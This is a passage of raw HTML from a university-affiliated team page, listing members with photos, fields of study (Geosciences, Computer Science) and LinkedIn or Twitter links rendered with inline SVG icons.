0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c268-outer\">\n            <div data-colibri-id=\"182-c268\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c268 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c269\" class=\"d-block style-920 style-local-182-c269 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c269-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c269-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c270\" class=\"h-global-transition-all h-heading style-914 style-local-182-c270 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c270\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c271\" class=\"h-text h-text-component style-915 style-local-182-c271 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c273\" class=\"style-921 style-local-182-c273 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c274-outer\">\n            <div data-colibri-id=\"182-c274\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c274 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c275\" class=\"d-block style-922 style-local-182-c275 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c275-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c275-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c276\" class=\"h-global-transition-all h-heading style-914 style-local-182-c276 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c276\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c277\" class=\"h-text h-text-component style-915 style-local-182-c277 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c279\" class=\"style-923 style-local-182-c279 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c385-outer\">\n            <div data-colibri-id=\"182-c385\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c385 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c386\" class=\"d-block style-913 style-local-182-c386 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c386-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c386-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c387\" class=\"h-global-transition-all h-heading style-914 style-local-182-c387 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c387\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c388\" class=\"h-text h-text-component style-915 style-local-182-c388 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c389\" class=\"style-917 style-local-182-c389 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c390-outer\">\n            <div data-colibri-id=\"182-c390\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c390 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c391\" class=\"d-block style-913 style-local-182-c391 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c391-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c391-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c392\" class=\"h-global-transition-all h-heading style-914 style-local-182-c392 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c392\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c393\" class=\"h-text h-text-component style-915 style-local-182-c393 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c394\" class=\"style-917 style-local-182-c394 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c395-outer\">\n            <div data-colibri-id=\"182-c395\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c395 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c396\" class=\"d-block style-913 style-local-182-c396 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c396-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c396-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c397\" class=\"h-global-transition-all h-heading style-914 style-local-182-c397 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c397\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c398\" class=\"h-text h-text-component style-915 style-local-182-c398 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c399\" class=\"style-917 style-local-182-c399 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c400-outer\">\n            <div data-colibri-id=\"182-c400\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c400 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c401\" class=\"d-block style-913 style-local-182-c401 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c401-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c401-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c402\" class=\"h-global-transition-all h-heading style-914 style-local-182-c402 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c402\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c403\" class=\"h-text h-text-component style-915 style-local-182-c403 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c405-outer\">\n            <div data-colibri-id=\"182-c405\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c405 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c406\" class=\"d-block style-913 style-local-182-c406 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c406-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c406-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c407\" class=\"h-global-transition-all h-heading style-914 style-local-182-c407 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c407\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c408\" class=\"h-text h-text-component style-915 style-local-182-c408 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c409\" class=\"style-917 style-local-182-c409 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c410-outer\">\n            <div data-colibri-id=\"182-c410\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c410 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c411\" class=\"d-block style-913 style-local-182-c411 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c411-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c411-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c412\" class=\"h-global-transition-all h-heading style-914 style-local-182-c412 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c412\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c413\" class=\"h-text h-text-component style-915 style-local-182-c413 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c414\" class=\"style-917 style-local-182-c414 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 